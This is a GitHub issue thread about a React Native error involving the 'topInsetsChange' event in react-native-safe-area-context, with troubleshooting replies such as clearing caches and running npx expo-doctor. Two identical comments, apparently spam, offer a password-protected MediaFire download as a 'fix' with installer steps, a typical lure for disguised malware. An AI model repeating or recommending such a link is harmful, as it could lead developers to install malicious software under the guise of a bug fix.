### ISSUE TITLE
Error: Unsupported top level event type "topInsetsChange" dispatched

### ISSUE THREAD

**Issue by junhwong** [th3rdwave/react-native-safe-area-context#524]
as this title
I couldn't find the wrong source, but I searched for the keyword **topInsetsChange**

[source](https://github.com/th3rdwave/react-native-safe-area-context/blob/main/android/src/fabric/java/com/th3rdwave/safeareacontext/InsetsChangeEvent.kt)

version: 4.10.9

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jacobp100** [comment]
There's not enough information to go on here. I will say the event you're pointing to is fundamental to this library working, so there's almost zero chance that would be the issue

**Comment by jonsherrard** [comment]
Hi there, I'm still investigating, but just trying to update the Tamagui expo-router starter to the new architecture and encountering this bug too.

**Comment by By-Trex** [comment]
++++++++

**Comment by ethras** [comment]
Still facing this issue even with deleting node_odules and package-lock.json

**Comment by jacobp100** [comment]
Provide a minimal reproduction if you want this to get fixed

**Comment by quantum0X** [comment]
> Still facing this issue even with deleting node_odules and package-lock.json
Be sure to update to the most recent version

**Comment by quantum0X** [comment]
> Still facing this issue even with deleting node_odules and package-lock.json


Be sure to update to the most recent version

**Comment by Yash-Gajewar** [comment]
What the hell why is no one talking about this issue, it is so frustrating and almost majority of the people are facing it and no one is talking about it. I am switching to flutter because of this issue, will never use react native again.

**Comment by ethras** [comment]
Add to clean all caches/node modules/lockfile etc. to make it work but it's working fine now

**Comment by fedorukol** [comment]
I've run into this issue too, deleting `node_modules` and `package-lock.json` didn't help, but I am using Expo and running: 

`npx expo-doctor` and `npx expo install --check` helped.

**Comment by gnewfield** [comment]
> I've run into this issue too, deleting `node_modules` and `package-lock.json` didn't help, but I am using Expo and running:
> 
> `npx expo-doctor` and `npx expo install --check` helped.

This worked for me. Thank you @fedorukol!

**Comment by Abdullah-Hanif-ST** [comment]
> npx expo install --check

Perfect
